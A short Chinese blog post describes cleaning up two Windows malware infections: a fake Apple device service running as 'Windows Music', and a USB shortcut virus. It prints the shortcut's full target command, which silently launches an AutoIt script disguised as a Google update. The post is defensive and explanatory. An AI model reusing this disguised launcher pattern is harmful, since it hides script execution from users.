标签 病毒 下的文章

中病毒applemobileservice.exe

iTunes自带的驱动服务程序叫AppleMobileDeviceService.exe ,这货少了一个Device单词。

文件常驻C:\Users\xx\AppData\Roaming\Apple\Mobile Device Support\AppleMobileDeviceService.exe 和 C:\Users\xx\AppData\Roaming\Apple\iTunes.Resouces\AppleMobileDeviceService.exe,程序名字和路径看起来相当有迷惑性。只是看到程序一直占用cpu 100%才发现有点可疑。刚开始不以为是病毒。以为苹果自带的驱动服务耍流氓。结果卸载iTunes重启这货还在一直跑。注册成一个叫Windows Music的服务。描述也是一大段唬人的英文。苹果的程序服务名字叫Windows Music让你暴露无遗。删除程序提示Windows Music占用中。sc delete 干掉之。可能是最近下载了苹果虚拟定位软件simulate有关。可能有捆绑。

virus.png

lnk virus

lnk_virus.png

链接目标:C:\Windows\system32\cmd.exe /c start ..\Skypee\AutoIt3.exe /AutoIt3ExecuteScript ..\Skypee\googleupdate.a3x explorer "%CD%" & exit

可能是U盘传到电脑里面来的。本机没有找到AutoIt3.exe和googleupdate.a3x文件。删除此lnk文件即可。